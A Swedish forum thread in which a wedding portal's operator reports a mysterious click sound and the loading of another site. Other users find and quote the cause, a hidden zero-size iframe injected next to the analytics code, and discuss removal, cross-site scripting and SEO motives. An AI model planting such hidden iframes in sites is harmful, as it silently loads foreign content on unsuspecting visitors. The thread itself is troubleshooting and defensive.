FAQ |
Kalender |
![]() |
#1 | ||
|
|||
Nykomling
|
Hoppas ni kan bringa klarhet i något som är mycket konstigt:
Jag jobbar med www.brollopsguiden.se (portal om bröllop) och igår när jag skulle gå in på vår hemsida laddas sajten Ambulansforum.se (syntes i statusraden)! Sen hör jag ett klick-ljud. Varje sida som laddas på vår hemsida åtföljs av ett klickljud! Jag provade att gå in på ambulansforum.se, men igår fungerade den inte. Det var något felmeddelande. MEN istället hör jag samma klickljud. Inte på någon annan sajt, bara på deras och vår! Idag är det samma sak! Ambulansforum laddas (väldigt snabbt, men jag hinner se det i statusraden), och sen är det klickljud! Frågan vi ställer oss här: är det någon som hackat in på vår sajt? Och varför laddas ambulansforum.se??? Hoppas någon har någon idé!!!!!!!! |
||
![]() |
![]() |
![]() |
#2 | |||
|
||||
Klarade millennium-buggen
|
Detta bör kanske raderas ur koden om du inte vill ha de.
<iframe src="http :// ambulansforum . se/PAM/ledare/t.html" width="0" height="0"></iframe> |
|||
![]() |
![]() |
![]() |
#3 | ||
|
|||
Nykomling
|
TACK!
HUR hamnade den där??? Så var det inte i den filen från början (google analytics kod)! Är det någon som hackat sig in? |
||
![]() |
![]() |
![]() |
#4 | |||
|
||||
|
Och den adressen går vidare till pingpong?
Citat:
|
|||
![]() |
![]() |
![]() |
#5 | ||
|
|||
Nykomling
|
Hurra! Hellbergsdörrar har varit ett gissel också! Var hittade du detta? Jag söker men får inte upp koden...
|
||
![]() |
![]() |
![]() |
#6 | ||
|
|||
Nykomling
|
På http://javaboutique.internet.com/PingPong/ hör jag samma klickljud som vi hade innan på brollopsguiden.se - det är från ett pingpong-spel! Hur skumt är inte detta??
Nu verkar allt dock ha gått tillbaka till det normala sen jag raderade "ambulansforum-strängen" från vår kod ![]() |
||
![]() |
![]() |
![]() |
#7 | ||
|
|||
Medlem
|
Intressant också att den java appleten på hellbergsdorrar identifierar sig som en java uppdatering? Luktar cross-site-scripting lång väg..
|
||
![]() |
![]() |
![]() |
#8 | ||
|
|||
Nykomling
|
Jag vet att vi har i alla fall ett ställe som är känsligt och som ska åtgärdas inom snar framtid...
|
||
![]() |
![]() |
![]() |
#9 | |||
|
||||
|
Har ni anlitat någon SEO-firma, eller är det något företag som utvecklat er webbplats? Det verkar ju som att någon vill höja flera sajters trafik eller ranking på Google.
Testa att kontakta Hellbergsdorrar och Ambulansforum och fråga om de varit i kontakt med SEO-folk. Jag skulle vara lite orolig för att Google får för sig att bestraffa er om de får för sig att det är något skumt med er sajt. |
|||
![]() |
![]() |
Svara |
|
|